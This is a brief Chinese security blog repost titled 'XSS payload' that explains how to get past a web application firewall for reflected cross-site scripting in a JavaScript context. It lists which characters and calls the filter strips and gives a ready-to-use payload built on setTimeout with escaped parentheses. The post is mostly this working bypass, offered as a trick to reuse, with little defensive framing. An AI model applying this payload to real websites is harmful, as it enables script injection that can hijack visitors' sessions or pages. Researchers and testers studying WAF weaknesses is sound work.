奇技淫巧(10) - XSS payload

admin
admin
admin
102800
文章
87
评论
2021年3月11日02:16:34评论245 views字数 221阅读0分44秒阅读模式


XSS WAF绕过:

        在JS上下文中进行反射,允许使用单引号


<, > ==> REMOVED '-anything()-' ==> '-anything-' '-alert()-' ==> REMOVED '-setTimeout``-' = allowed


Payload: '-setTimeout`promptu0028document.domainu0029`-'


奇技淫巧(10) - XSS payload


本文始发于微信公众号(Khan安全攻防实验室):奇技淫巧(10) - XSS payload

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月11日02:16:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   奇技淫巧(10) - XSS payloadhttps://cn-sec.com/archives/286493.html

发表评论

匿名网友 填写信息